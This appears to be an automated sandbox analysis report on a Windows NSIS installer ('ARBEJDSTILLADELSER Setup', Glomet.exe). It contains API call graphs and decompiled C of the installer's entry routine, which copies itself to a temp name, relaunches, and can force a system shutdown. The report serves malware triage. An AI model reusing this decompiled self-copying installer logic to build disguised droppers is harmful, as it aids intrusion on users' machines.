3458 40336b SetFilePointer 3431->3458 3434 403355 ReadFile 3432->3434 3435 403192 3434->3435 3436 4031a4 GetTickCount 3435->3436 3437 4032ee 3435->3437 3439 4032d8 3435->3439 3436->3439 3446 4031f3 3436->3446 3438 403330 3437->3438 3443 4032f2 3437->3443 3441 403355 ReadFile 3438->3441 3439->3323 3440 403355 ReadFile 3440->3446 3441->3439 3442 403355 ReadFile 3442->3443 3443->3439 3443->3442 3444 405e91 WriteFile 3443->3444 3444->3443 3445 403249 GetTickCount 3445->3446 3446->3439 3446->3440 3446->3445 3447 40326e MulDiv wsprintfA 3446->3447 3449 405e91 WriteFile 3446->3449 3448 405378 24 API calls 3447->3448 3448->3446 3449->3446 3451 405e62 ReadFile 3450->3451 3452 403368 3451->3452 3452->3325 3453->3316 3455 4066bc PeekMessageA 3454->3455 3456 4066b2 DispatchMessageA 3455->3456 3457 402ed7 3455->3457 3456->3455 3457->3309 3458->3432 3460 403d16 3459->3460 3476 4061b5 wsprintfA 3460->3476 3462 403d87 3477 403dbb 3462->3477 3464 403ac2 3464->3339 3465 403d8c 3465->3464 3466 4062ea 17 API calls 3465->3466 3466->3465 3480 404320 3467->3480 3469 405494 3470 404320 SendMessageA 3469->3470 3471 4054a6 OleUninitialize 3470->3471 3471->3370 3472 40546d 3472->3469 3483 401389 3472->3483 3474->3335 3475->3341 3476->3462 3478 4062ea 17 API calls 3477->3478 3479 403dc9 SetWindowTextA 3478->3479 3479->3465 3481 404338 3480->3481 3482 404329 SendMessageA 3480->3482 3481->3472 3482->3481 3485 401390 3483->3485 3484 4013fe 3484->3472 3485->3484 3486 4013cb MulDiv SendMessageA 3485->3486 3486->3485 3488 4039b6 3487->3488 3489 403980 3488->3489 3490 4039bb FreeLibrary GlobalFree 3488->3490 3489->3390 3490->3489 3490->3490 3491 402733 3492 40273a 3491->3492 3494 402a47 3491->3494 3493 402c17 17 API calls 3492->3493 3495 402741 3493->3495 3496 402750 SetFilePointer 3495->3496 3496->3494 3497 402760 3496->3497 3499 4061b5 wsprintfA 3497->3499 3499->3494 4285 401e35 GetDC 4286 402c17 17 API calls 4285->4286 4287 401e47 GetDeviceCaps MulDiv ReleaseDC 4286->4287 4288 402c17 17 API calls 4287->4288 4289 401e78 4288->4289 4290 4062ea 17 API calls 4289->4290 4291 401eb5 CreateFontIndirectA 4290->4291 4292 402628 4291->4292 3515 4054b6 3516 405661 3515->3516 3517 4054d8 GetDlgItem GetDlgItem GetDlgItem 3515->3517 3519 405691 3516->3519 3520 405669 GetDlgItem CreateThread FindCloseChangeNotification 3516->3520 3561 404309 SendMessageA 3517->3561 3522 4056bf 3519->3522 3523 4056e0 3519->3523 3524 4056a7 ShowWindow ShowWindow 3519->3524 3520->3519 3584 40544a 5 API calls 3520->3584 3521 405548 3527 40554f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3521->3527 3525 4056c7 3522->3525 3526 40571a 3522->3526 3570 40433b 3523->3570 3566 404309 SendMessageA 3524->3566 3529 4056f3 ShowWindow 3525->3529 3530 4056cf 3525->3530 3526->3523 3534 405727 SendMessageA 3526->3534 3532 4055a1 SendMessageA SendMessageA 3527->3532 3533 4055bd 3527->3533 3536 405713 3529->3536 3537 405705 3529->3537 3567 4042ad 3530->3567 3532->3533 3540 4055d0 3533->3540 3541 4055c2 SendMessageA 3533->3541 3542 405740 CreatePopupMenu 3534->3542 3543 4056ec 3534->3543 3539 4042ad SendMessageA 3536->3539 3538 405378 24 API calls 3537->3538 3538->3536 3539->3526 3562 4042d4 3540->3562 3541->3540 3544 4062ea 17 API calls 3542->3544 3546 405750 AppendMenuA 3544->3546 3548 405781 TrackPopupMenu 3546->3548 3549 40576e GetWindowRect 3546->3549 3547 4055e0 3550 4055e9 ShowWindow 3547->3550 3551 40561d GetDlgItem SendMessageA 3547->3551 3548->3543 3553 40579d 3548->3553 3549->3548 3554 40560c 3550->3554 3555 4055ff ShowWindow 3550->3555 3551->3543 3552 405644 SendMessageA SendMessageA 3551->3552 3552->3543 3556 4057bc SendMessageA 3553->3556 3565 404309 SendMessageA 3554->3565 3555->3554 3556->3556 3557 4057d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3556->3557 3559 4057fb SendMessageA 3557->3559 3559->3559 3560 40581d GlobalUnlock SetClipboardData CloseClipboard 3559->3560 3560->3543 3561->3521 3563 4062ea 17 API calls 3562->3563 3564 4042df SetDlgItemTextA 3563->3564 3564->3547 3565->3551 3566->3522 3568 4042b4 3567->3568 3569 4042ba SendMessageA 3567->3569 3568->3569 3569->3523 3571 4043fe 3570->3571 3572 404353 GetWindowLongA 3570->3572 3571->3543 3572->3571 3573 404368 3572->3573 3573->3571 3574 404395 GetSysColor 3573->3574 3575 404398 3573->3575 3574->3575 3576 4043a8 SetBkMode 3575->3576 3577 40439e SetTextColor 3575->3577 3578 4043c0 GetSysColor 3576->3578 3579 4043c6 3576->3579 3577->3576 3578->3579 3580 4043cd SetBkColor 3579->3580 3581 4043d7 3579->3581 3580->3581 3581->3571 3582 4043f1 CreateBrushIndirect 3581->3582 3583 4043ea DeleteObject 3581->3583 3582->3571 3583->3582 4293 404ab7 4294 404ae3 4293->4294 4295 404ac7 4293->4295 4297 404b16 4294->4297 4298 404ae9 SHGetPathFromIDListA 4294->4298 4304 405951 GetDlgItemTextA 4295->4304 4300 404b00 SendMessageA 4298->4300 4301 404af9 4298->4301 4299 404ad4 SendMessageA 4299->4294 4300->4297 4302 40140b 2 API calls 4301->4302 4302->4300 4304->4299 4305 4014b7 4306 4014bd 4305->4306 4307 401389 2 API calls 4306->4307 4308 4014c5 4307->4308 4309 401bba 4314 406257 lstrcpynA 4309->4314 4311 401bc9 4315 406257 lstrcpynA 4311->4315 4313 402936 4314->4311 4315->4313 3712 4015bb 3713 402c39 17 API calls 3712->3713 3714 4015c2 3713->3714 3715 405c82 4 API calls 3714->3715 3727 4015ca 3715->3727 3716 401624 3718 401652 3716->3718 3719 401629 3716->3719 3717 405c14 CharNextA 3717->3727 3721 401423 24 API calls 3718->3721 3720 401423 24 API calls 3719->3720 3722 401630 3720->3722 3728 40164a 3721->3728 3731 406257 lstrcpynA 3722->3731 3724 4058bb 2 API calls 3724->3727 3725 4058d8 5 API calls 3725->3727 3726 40163b SetCurrentDirectoryA 3726->3728 3727->3716 3727->3717 3727->3724 3727->3725 3729 40160c GetFileAttributesA 3727->3729 3730 40583e 4 API calls 3727->3730 3729->3727 3730->3727 3731->3726 4316 4016bb 4317 402c39 17 API calls 4316->4317 4318 4016c1 GetFullPathNameA 4317->4318 4319 4016d8 4318->4319 4325 4016f9 4318->4325 4322 4065ce 2 API calls 4319->4322 4319->4325 4320 402ac5 4321 40170d GetShortPathNameA 4321->4320 4323 4016e9 4322->4323 4323->4325 4326 406257 lstrcpynA 4323->4326 4325->4320 4325->4321 4326->4325 4327 40443f 4328 404455 4327->4328 4333 404561 4327->4333 4331 4042d4 18 API calls 4328->4331 4329 4045d0 4330 40469a 4329->4330 4332 4045da GetDlgItem 4329->4332 4335 40433b 8 API calls 4330->4335 4334 4044ab 4331->4334 4336 4045f0 4332->4336 4337 404658 4332->4337 4333->4329 4333->4330 4338 4045a5 GetDlgItem SendMessageA 4333->4338 4339 4042d4 18 API calls 4334->4339 4340 404695 4335->4340 4336->4337 4341 404616 SendMessageA LoadCursorA SetCursor 4336->4341 4337->4330 4342 40466a 4337->4342 4360 4042f6 KiUserCallbackDispatcher 4338->4360 4344 4044b8 CheckDlgButton 4339->4344 4361 4046e3 4341->4361 4347 404670 SendMessageA 4342->4347 4348 404681 4342->4348 4358 4042f6 KiUserCallbackDispatcher 4344->4358 4347->4348 4348->4340 4352 404687 SendMessageA 4348->4352 4349 4045cb 4353 4046bf SendMessageA 4349->4353 4350 4044d6 GetDlgItem 4359 404309 SendMessageA 4350->4359 4352->4340 4353->4329 4355 4044ec SendMessageA 4356 404513 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4355->4356 4357 40450a GetSysColor 4355->4357 4356->4340 4357->4356 4358->4350 4359->4355 4360->4349 4364 405933 ShellExecuteExA 4361->4364 4363 404649 LoadCursorA SetCursor 4363->4337 4364->4363

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 004033B3 Relevance: 93.2, APIs: 33, Strings: 20, Instructions: 417stringfilecomCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 4033b3-403403 SetErrorMode GetVersionExA 1 403444 0->1 2 403405-40341f GetVersionExA 0->2 4 40344b 1->4 3 403421-403440 2->3 2->4 3->1 5 40344d-403458 4->5 6 40346f-403476 4->6 7 40345a-403469 5->7 8 40346b 5->8 9 403480-4034c0 6->9 10 403478 6->10 7->6 8->6 11 4034c2-4034ca call 406663 9->11 12 4034d3 9->12 10->9 11->12 17 4034cc 11->17 14 4034d8-4034ec call 4065f5 lstrlenA 12->14 19 4034ee-40350a call 406663 * 3 14->19 17->12 26 40351b-40357b #17 OleInitialize SHGetFileInfoA call 406257 GetCommandLineA call 406257 19->26 27 40350c-403512 19->27 34 403586-403599 call 405c14 CharNextA 26->34 35 40357d-403581 26->35 27->26 31 403514 27->31 31->26 38 40365a-40365e 34->38 35->34 39 403664 38->39 40 40359e-4035a1 38->40 43 403678-403692 GetTempPathA call 403382 39->43 41 4035a3-4035a7 40->41 42 4035a9-4035b0 40->42 41->41 41->42 44 4035b2-4035b3 42->44 45 4035b7-4035ba 42->45 53 403694-4036b2 GetWindowsDirectoryA lstrcatA call 403382 43->53 54 4036ea-403702 DeleteFileA call 402f0c 43->54 44->45 47 4035c0-4035c4 45->47 48 40364b-403657 call 405c14 45->48 51 4035c6-4035cc 47->51 52 4035dc-403609 47->52 48->38 63 403659 48->63 57 4035d2 51->57 58 4035ce-4035d0 51->58 59 40361b-403649 52->59 60 40360b-403611 52->60 53->54 71 4036b4-4036e4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403382 53->71 68 403795-4037a6 call 403963 OleUninitialize 54->68 69 403708-40370e 54->69 57->52 58->52 58->57 59->48 62 403666-403673 call 406257 59->62 65 403613-403615 60->65 66 403617 60->66 62->43 63->38 65->59 65->66 66->59 82 4037ac-4037bb call 40596d ExitProcess 68->82 83 4038cf-4038d5 68->83 72 403710-40371b call 405c14 69->72 73 403786-40378d call 403a3d 69->73 71->54 71->68 84 403751-40375a 72->84 85 40371d-403746 72->85 80 403792 73->80 80->68 87 4038d7-4038ec GetCurrentProcess OpenProcessToken 83->87 88 40394d-403955 83->88 94 4037c1-4037d5 call 4058d8 lstrcatA 84->94 95 40375c-40376a call 405cd7 84->95 91 403748-40374a 85->91 89 40391d-40392b call 406663 87->89 90 4038ee-403917 LookupPrivilegeValueA AdjustTokenPrivileges 87->90 92 403957 88->92 93 40395a-40395d ExitProcess 88->93 106 403939-403944 ExitWindowsEx 89->106 107 40392d-403937 89->107 90->89 91->84 98 40374c-40374f 91->98 92->93 104 4037e2-4037fc lstrcatA lstrcmpiA 94->104 105 4037d7-4037dd lstrcatA 94->105 95->68 108 40376c-403782 call 406257 * 2 95->108 98->84 98->91 104->68 110 4037fe-403801 104->110 105->104 106->88 111 403946-403948 call 40140b 106->111 107->106 107->111 108->73 113 403803-403808 call 40583e 110->113 114 40380a call 4058bb 110->114 111->88 122 40380f-40381d SetCurrentDirectoryA 113->122 114->122 123 40382a-403855 call 406257 122->123 124 40381f-403825 call 406257 122->124 128 40385b-403878 call 4062ea DeleteFileA 123->128 124->123 131 4038b8-4038c1 128->131 132 40387a-40388a CopyFileA 128->132 131->128 134 4038c3-4038ca call 406030 131->134 132->131 133 40388c-4038ac call 406030 call 4062ea call 4058f0 132->133 133->131 143 4038ae-4038b5 CloseHandle 133->143 134->68 143->131
                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                              			_entry_() {
				CHAR* _v8;
				long _v12;
				char _v16;
				long _v20;
				void* _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed int _v42;
				long _v44;
				signed int _v48;
				char _v163;
				char _v175;
				signed short _v182;
				struct _OSVERSIONINFOA _v196;
				struct _SHFILEINFOA _v548;
				intOrPtr* _t87;
				CHAR* _t91;
				char* _t93;
				void* _t95;
				void* _t99;
				CHAR* _t101;
				signed int _t103;
				int _t106;
				void* _t107;
				int _t108;
				void* _t110;
				void* _t134;
				signed int _t150;
				void* _t153;
				void* _t158;
				intOrPtr* _t159;
				void* _t170;
				char* _t171;
				CHAR* _t173;
				void _t179;
				void* _t198;
				void* _t199;
				signed char* _t213;
				CHAR* _t217;
				CHAR* _t218;
				void* _t223;

				_v20 = 0;
				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v12 = 0;
				_v16 = 0x20;
				SetErrorMode(0x8001); // executed
				_v196.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v196.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v196) != 0) {
					L3:
					_t223 = _v196.dwPlatformId - 2;
					L4:
					if(_t223 < 0) {
						_v42 = _v42 & 0x00000000;
						if(_v175 < 0x41) {
							_v48 = 0;
						} else {
							_v48 = _v175 - 0x40;
						}
					}
					if(_v196.dwMajorVersion < 0xa) {
						_v182 = _v182 & 0x00000000;
					}
					 *0x42f4d8 = _v196.dwBuildNumber;
					 *0x42f4dc = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
					if( *0x42f4de != 0x600) {
						_t159 = E00406663(0);
						if(_t159 != 0) {
							 *_t159(0xc00);
						}
					}
					_t217 = "UXTHEME";
					goto L14;
					while(1) {
						L37:
						_t179 =  *_t95;
						_t234 = _t179;
						if(_t179 == 0) {
							break;
						}
						__eflags = _t179 - 0x20;
						if(_t179 != 0x20) {
							L23:
							__eflags =  *_t95 - 0x22;
							_v16 = 0x20;
							if( *_t95 == 0x22) {
								_t95 = _t95 + 1;
								__eflags = _t95;
								_v16 = 0x22;
							}
							__eflags =  *_t95 - 0x2f;
							if( *_t95 != 0x2f) {
								L35:
								_t95 = E00405C14(_t95, _v16);
								__eflags =  *_t95 - 0x22;
								if(__eflags == 0) {
									_t95 = _t95 + 1;
									__eflags = _t95;
								}
								continue;
							} else {
								_t95 = _t95 + 1;
								__eflags =  *_t95 - 0x53;
								if( *_t95 != 0x53) {
									L30:
									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
										L34:
										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
											__eflags = _t95 + 2;
											E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens", _t95 + 2);
											L40:
											_t218 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
											GetTempPathA(0x400, _t218); // executed
											_t99 = E00403382(_t234);
											_t235 = _t99;
											if(_t99 != 0) {
												L43:
												DeleteFileA("1033"); // executed
												_t101 = E00402F0C(_t237, _v12); // executed
												_v8 = _t101;
												if(_t101 != 0) {
													L53:
													E00403963();
													__imp__OleUninitialize();
													_t248 = _v8;
													if(_v8 == 0) {
														__eflags =  *0x42f4b4;
														if( *0x42f4b4 == 0) {
															L77:
															_t103 =  *0x42f4cc;
															__eflags = _t103 - 0xffffffff;
															if(_t103 != 0xffffffff) {
																_v20 = _t103;
															}
															ExitProcess(_v20);
														}
														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
														__eflags = _t106;
														if(_t106 != 0) {
															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
															_v40.PrivilegeCount = 1;
															_v28 = 2;
															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
														}
														_t107 = E00406663(4);
														__eflags = _t107;
														if(_t107 == 0) {
															L75:
															_t108 = ExitWindowsEx(2, 0x80040002);
															__eflags = _t108;
															if(_t108 != 0) {
																goto L77;
															}
															goto L76;
														} else {
															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
															__eflags = _t110;
															if(_t110 == 0) {
																L76:
																E0040140B(9);
																goto L77;
															}
															goto L75;
														}
													}
													E0040596D(_v8, 0x200010);
													ExitProcess(2);
												}
												if( *0x42f43c == _t101) {
													L52:
													 *0x42f4cc =  *0x42f4cc | 0xffffffff;
													_v20 = E00403A3D( *0x42f4cc);
													goto L53;
												}
												_t213 = E00405C14(_t171, _t101);
												if(_t213 < _t171) {
													L49:
													_t244 = _t213 - _t171;
													_v8 = "Error launching installer";
													if(_t213 < _t171) {
														_t173 = E004058D8(_t248);
														lstrcatA(_t218, "~nsu");
														if(_t173 != 0) {
															lstrcatA(_t218, "A");
														}
														lstrcatA(_t218, ".tmp");
														_t211 = "C:\\programdata";
														if(lstrcmpiA(_t218, "C:\\programdata") != 0) {
															_push(_t218);
															if(_t173 == 0) {
																E004058BB();
															} else {
																E0040583E();
															}
															SetCurrentDirectoryA(_t218);
															if("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens" == 0) {
																E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens", _t211);
															}
															E00406257(0x430000, _v24);
															_t194 = "A";
															_v12 = 0x1a;
															 *0x430400 = "A";
															do {
																E004062EA(_t173, 0x429450, _t218, 0x429450,  *((intOrPtr*)( *0x42f430 + 0x120)));
																DeleteFileA(0x429450);
																_t173 = 0;
																if(_v8 != 0 && CopyFileA("C:\\programdata\\Glomet.exe", 0x429450, 1) != 0) {
																	E00406030(_t194, 0x429450, 0);
																	E004062EA(0, 0x429450, _t218, 0x429450,  *((intOrPtr*)( *0x42f430 + 0x124)));
																	_t134 = E004058F0(0x429450);
																	if(_t134 != 0) {
																		CloseHandle(_t134);
																		_v8 = 0;
																	}
																}
																 *0x430400 =  *0x430400 + 1;
																_t62 =  &_v12;
																 *_t62 = _v12 - 1;
															} while ( *_t62 != 0);
															E00406030(_t194, _t218, _t173);
														}
														goto L53;
													}
													 *_t213 =  *_t213 & 0x00000000;
													_t214 =  &(_t213[4]);
													if(E00405CD7(_t244,  &(_t213[4])) == 0) {
														goto L53;
													}
													E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens", _t214);
													E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1", _t214);
													_v8 = _v8 & 0x00000000;
													goto L52;
												}
												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
												while( *_t213 != _t150) {
													_t213 = _t213 - 1;
													if(_t213 >= _t171) {
														continue;
													}
													goto L49;
												}
												goto L49;
											}
											GetWindowsDirectoryA(_t218, 0x3fb);
											lstrcatA(_t218, "\\Temp");
											_t153 = E00403382(_t235);
											_t236 = _t153;
											if(_t153 != 0) {
												goto L43;
											}
											GetTempPathA(0x3fc, _t218);
											lstrcatA(_t218, "Low");
											SetEnvironmentVariableA("TEMP", _t218);
											SetEnvironmentVariableA("TMP", _t218);
											_t158 = E00403382(_t236);
											_t237 = _t158;
											if(_t158 == 0) {
												goto L53;
											}
											goto L43;
										}
										goto L35;
									}
									_t198 =  *((intOrPtr*)(_t95 + 4));
									__eflags = _t198 - 0x20;
									if(_t198 == 0x20) {
										L33:
										_t42 =  &_v12;
										 *_t42 = _v12 | 0x00000004;
										__eflags =  *_t42;
										goto L34;
									}
									__eflags = _t198;
									if(_t198 != 0) {
										goto L34;
									}
									goto L33;
								}
								_t199 =  *(_t95 + 1);
								__eflags = _t199 - 0x20;
								if(_t199 == 0x20) {
									L29:
									 *0x42f4c0 = 1;
									goto L30;
								}
								__eflags = _t199;
								if(_t199 != 0) {
									goto L30;
								}
								goto L29;
							}
						} else {
							goto L22;
						}
						do {
							L22:
							_t95 = _t95 + 1;
							__eflags =  *_t95 - 0x20;
						} while ( *_t95 == 0x20);
						goto L23;
					}
					goto L40;
					L14:
					E004065F5(_t217); // executed
					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
					if( *_t217 != 0) {
						goto L14;
					} else {
						E00406663(0xb);
						 *0x42f424 = E00406663(9);
						_t87 = E00406663(7);
						if(_t87 != 0) {
							_t87 =  *_t87(0x1e);
							if(_t87 != 0) {
								 *0x42f4dc =  *0x42f4dc | 0x00000080;
							}
						}
						__imp__#17(_t170);
						__imp__OleInitialize(0); // executed
						 *0x42f4e0 = _t87;
						SHGetFileInfoA(0x429850, 0,  &_v548, 0x160, 0); // executed
						E00406257("ARBEJDSTILLADELSER Setup", "NSIS Error");
						_t91 = GetCommandLineA();
						_t171 = "\"C:\\programdata\\Glomet.exe\" ";
						E00406257(_t171, _t91);
						 *0x42f420 = 0x400000;
						_t93 = _t171;
						if("\"C:\\programdata\\Glomet.exe\" " == 0x22) {
							_v16 = 0x22;
							_t93 =  &M00435001;
						}
						_t95 = CharNextA(E00405C14(_t93, _v16));
						_v24 = _t95;
						goto L37;
					}
				}
				_v196.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v196);
				if(_v196.dwPlatformId != 2) {
					goto L4;
				} else {
					_v42 = 4;
					asm("sbb eax, eax");
					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
					goto L3;
				}
			}












































                                                                                                                                                                              0x004033c5
                                                                                                                                                                              0x004033c8
                                                                                                                                                                              0x004033cf
                                                                                                                                                                              0x004033d2
                                                                                                                                                                              0x004033d6
                                                                                                                                                                              0x004033e9
                                                                                                                                                                              0x004033ef
                                                                                                                                                                              0x004033f2
                                                                                                                                                                              0x004033f5
                                                                                                                                                                              0x00403403
                                                                                                                                                                              0x00403444
                                                                                                                                                                              0x00403444
                                                                                                                                                                              0x0040344b
                                                                                                                                                                              0x0040344b
                                                                                                                                                                              0x0040344d
                                                                                                                                                                              0x00403458
                                                                                                                                                                              0x0040346b
                                                                                                                                                                              0x0040345a
                                                                                                                                                                              0x00403465
                                                                                                                                                                              0x00403465
                                                                                                                                                                              0x00403458
                                                                                                                                                                              0x00403476
                                                                                                                                                                              0x00403478
                                                                                                                                                                              0x00403478
                                                                                                                                                                              0x0040348d
                                                                                                                                                                              0x004034b2
                                                                                                                                                                              0x004034c0
                                                                                                                                                                              0x004034c3
                                                                                                                                                                              0x004034ca
                                                                                                                                                                              0x004034d1
                                                                                                                                                                              0x004034d1
                                                                                                                                                                              0x004034ca
                                                                                                                                                                              0x004034d3
                                                                                                                                                                              0x004034d3
                                                                                                                                                                              0x0040365a
                                                                                                                                                                              0x0040365a
                                                                                                                                                                              0x0040365a
                                                                                                                                                                              0x0040365c
                                                                                                                                                                              0x0040365e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040359e
                                                                                                                                                                              0x004035a1
                                                                                                                                                                              0x004035a9
                                                                                                                                                                              0x004035a9
                                                                                                                                                                              0x004035ac
                                                                                                                                                                              0x004035b0
                                                                                                                                                                              0x004035b2
                                                                                                                                                                              0x004035b2
                                                                                                                                                                              0x004035b3
                                                                                                                                                                              0x004035b3
                                                                                                                                                                              0x004035b7
                                                                                                                                                                              0x004035ba
                                                                                                                                                                              0x0040364b
                                                                                                                                                                              0x0040364f
                                                                                                                                                                              0x00403654
                                                                                                                                                                              0x00403657
                                                                                                                                                                              0x00403659
                                                                                                                                                                              0x00403659
                                                                                                                                                                              0x00403659
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004035c0
                                                                                                                                                                              0x004035c0
                                                                                                                                                                              0x004035c1
                                                                                                                                                                              0x004035c4
                                                                                                                                                                              0x004035dc
                                                                                                                                                                              0x00403607
                                                                                                                                                                              0x00403609
                                                                                                                                                                              0x0040361b
                                                                                                                                                                              0x00403646
                                                                                                                                                                              0x00403649
                                                                                                                                                                              0x00403666
                                                                                                                                                                              0x0040366a
                                                                                                                                                                              0x00403673
                                                                                                                                                                              0x00403678
                                                                                                                                                                              0x0040367e
                                                                                                                                                                              0x00403689
                                                                                                                                                                              0x0040368b
                                                                                                                                                                              0x00403690
                                                                                                                                                                              0x00403692
                                                                                                                                                                              0x004036ea
                                                                                                                                                                              0x004036ef
                                                                                                                                                                              0x004036f8
                                                                                                                                                                              0x004036ff
                                                                                                                                                                              0x00403702
                                                                                                                                                                              0x00403795
                                                                                                                                                                              0x00403795
                                                                                                                                                                              0x0040379a
                                                                                                                                                                              0x004037a3
                                                                                                                                                                              0x004037a6
                                                                                                                                                                              0x004038cf
                                                                                                                                                                              0x004038d5
                                                                                                                                                                              0x0040394d
                                                                                                                                                                              0x0040394d
                                                                                                                                                                              0x00403952
                                                                                                                                                                              0x00403955
                                                                                                                                                                              0x00403957
                                                                                                                                                                              0x00403957
                                                                                                                                                                              0x0040395d
                                                                                                                                                                              0x0040395d
                                                                                                                                                                              0x004038e4
                                                                                                                                                                              0x004038ea
                                                                                                                                                                              0x004038ec
                                                                                                                                                                              0x004038f8
                                                                                                                                                                              0x00403909
                                                                                                                                                                              0x00403910
                                                                                                                                                                              0x00403917
                                                                                                                                                                              0x00403917
                                                                                                                                                                              0x0040391f
                                                                                                                                                                              0x00403924
                                                                                                                                                                              0x0040392b
                                                                                                                                                                              0x00403939
                                                                                                                                                                              0x0040393c
                                                                                                                                                                              0x00403942
                                                                                                                                                                              0x00403944
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040392d
                                                                                                                                                                              0x00403933
                                                                                                                                                                              0x00403935
                                                                                                                                                                              0x00403937
                                                                                                                                                                              0x00403946
                                                                                                                                                                              0x00403948
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403948
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403937
                                                                                                                                                                              0x0040392b
                                                                                                                                                                              0x004037b4
                                                                                                                                                                              0x004037bb
                                                                                                                                                                              0x004037bb
                                                                                                                                                                              0x0040370e
                                                                                                                                                                              0x00403786
                                                                                                                                                                              0x00403786
                                                                                                                                                                              0x00403792
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403792
                                                                                                                                                                              0x00403717
                                                                                                                                                                              0x0040371b
                                                                                                                                                                              0x00403751
                                                                                                                                                                              0x00403751
                                                                                                                                                                              0x00403753
                                                                                                                                                                              0x0040375a
                                                                                                                                                                              0x004037cc
                                                                                                                                                                              0x004037ce
                                                                                                                                                                              0x004037d5
                                                                                                                                                                              0x004037dd
                                                                                                                                                                              0x004037dd
                                                                                                                                                                              0x004037e8
                                                                                                                                                                              0x004037ed
                                                                                                                                                                              0x004037fc
                                                                                                                                                                              0x00403800
                                                                                                                                                                              0x00403801
                                                                                                                                                                              0x0040380a
                                                                                                                                                                              0x00403803
                                                                                                                                                                              0x00403803
                                                                                                                                                                              0x00403803
                                                                                                                                                                              0x00403810
                                                                                                                                                                              0x0040381d
                                                                                                                                                                              0x00403825
                                                                                                                                                                              0x00403825
                                                                                                                                                                              0x00403832
                                                                                                                                                                              0x00403837
                                                                                                                                                                              0x00403841
                                                                                                                                                                              0x00403855
                                                                                                                                                                              0x0040385b
                                                                                                                                                                              0x00403867
                                                                                                                                                                              0x0040386d
                                                                                                                                                                              0x00403873
                                                                                                                                                                              0x00403878
                                                                                                                                                                              0x0040388e
                                                                                                                                                                              0x0040389f
                                                                                                                                                                              0x004038a5
                                                                                                                                                                              0x004038ac
                                                                                                                                                                              0x004038af
                                                                                                                                                                              0x004038b5
                                                                                                                                                                              0x004038b5
                                                                                                                                                                              0x004038ac
                                                                                                                                                                              0x004038b8
                                                                                                                                                                              0x004038be
                                                                                                                                                                              0x004038be
                                                                                                                                                                              0x004038be
                                                                                                                                                                              0x004038c5
                                                                                                                                                                              0x004038c5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004037fc
                                                                                                                                                                              0x0040375c
                                                                                                                                                                              0x0040375f
                                                                                                                                                                              0x0040376a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403772
                                                                                                                                                                              0x0040377d
                                                                                                                                                                              0x00403782
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403782
                                                                                                                                                                              0x00403746
                                                                                                                                                                              0x00403748
                                                                                                                                                                              0x0040374c
                                                                                                                                                                              0x0040374f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040374f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403748
                                                                                                                                                                              0x0040369a
                                                                                                                                                                              0x004036a6
                                                                                                                                                                              0x004036ab
                                                                                                                                                                              0x004036b0
                                                                                                                                                                              0x004036b2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004036ba
                                                                                                                                                                              0x004036c2
                                                                                                                                                                              0x004036d3
                                                                                                                                                                              0x004036db
                                                                                                                                                                              0x004036dd
                                                                                                                                                                              0x004036e2
                                                                                                                                                                              0x004036e4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
